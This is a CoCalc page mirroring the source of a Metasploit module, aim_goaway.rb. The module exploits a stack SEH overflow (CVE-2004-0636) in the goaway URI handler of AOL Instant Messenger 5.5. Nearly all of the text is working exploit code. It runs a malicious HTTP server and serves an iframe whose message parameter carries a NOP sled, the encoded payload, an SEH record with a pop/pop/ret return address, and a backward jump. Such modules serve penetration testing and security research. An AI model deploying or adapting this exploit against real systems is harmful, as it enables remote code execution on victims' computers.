Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/aim_goaway.rb
32007 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  #

10
  # This module acts as an HTTP server and exploits an SEH overwrite

11
  #

12
  include Msf::Exploit::Seh

13
  include Msf::Exploit::Remote::HttpServer::HTML

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'AOL Instant Messenger goaway Overflow',

20
        'Description' => %q{

21
          This module exploits a flaw in the handling of AOL Instant

22
          Messenger's 'goaway' URI handler.  An attacker can execute

23
          arbitrary code by supplying an overly sized buffer as the

24
          'message' parameter.  This issue is known to affect AOL Instant

25
          Messenger 5.5.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'skape',

30
          'thief <thief[at]hick.org>'

31
        ],

32
        'References' => [

33
          [ 'CVE', '2004-0636' ],

34
          [ 'OSVDB', '8398' ],

35
          [ 'BID', '10889'],

36
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],

37
        ],

38
        'Payload' => {

39
          'Space' => 1014,

40
          'MaxNops' => 1014,

41
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",

42
          'StackAdjustment' => -3500

43
        },

44
        'Targets' => [

45
          # Target 0: Automatic

46
          [

47
            'Windows NT/2000/XP/2003 Automatic',

48
            {

49
              'Platform' => 'win',

50
              'Rets' =>

51
                [

52
                  0x1108118f, # proto.com: pop/pop/ret

53
                ]

54
            },

55
          ],

56
        ],

57
        'DefaultTarget' => 0,

58
        'DisclosureDate' => '2004-08-09',

59
        'Notes' => {

60
          'Reliability' => UNKNOWN_RELIABILITY,

61
          'Stability' => UNKNOWN_STABILITY,

62
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

63
        }

64
      )

65
    )

66
  end

67


68
  def on_request_uri(cli, _request)

69
    # Re-generate the payload

70
    return if ((p = regenerate_payload(cli)).nil?)

71


72
    # Build out the message

73
    msg =

74
      make_nops(1014 - p.encoded.length) +     # NOP sled before the payload

75
      p.encoded +                              # store the payload

76
      generate_seh_record(target['Rets'][0]) + # set up the SEH frame

77
      "\x90\xe9\x13\xfc\xff\xff"               # jmp -1000

78


79
    # Build the HTML content

80
    content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"

81


82
    print_status("Sending #{name}")

83


84
    # Transmit the response to the client

85
    send_response_html(cli, content)

86


87
    # Handle the payload

88
    handler(cli)

89
  end

90
end

91


92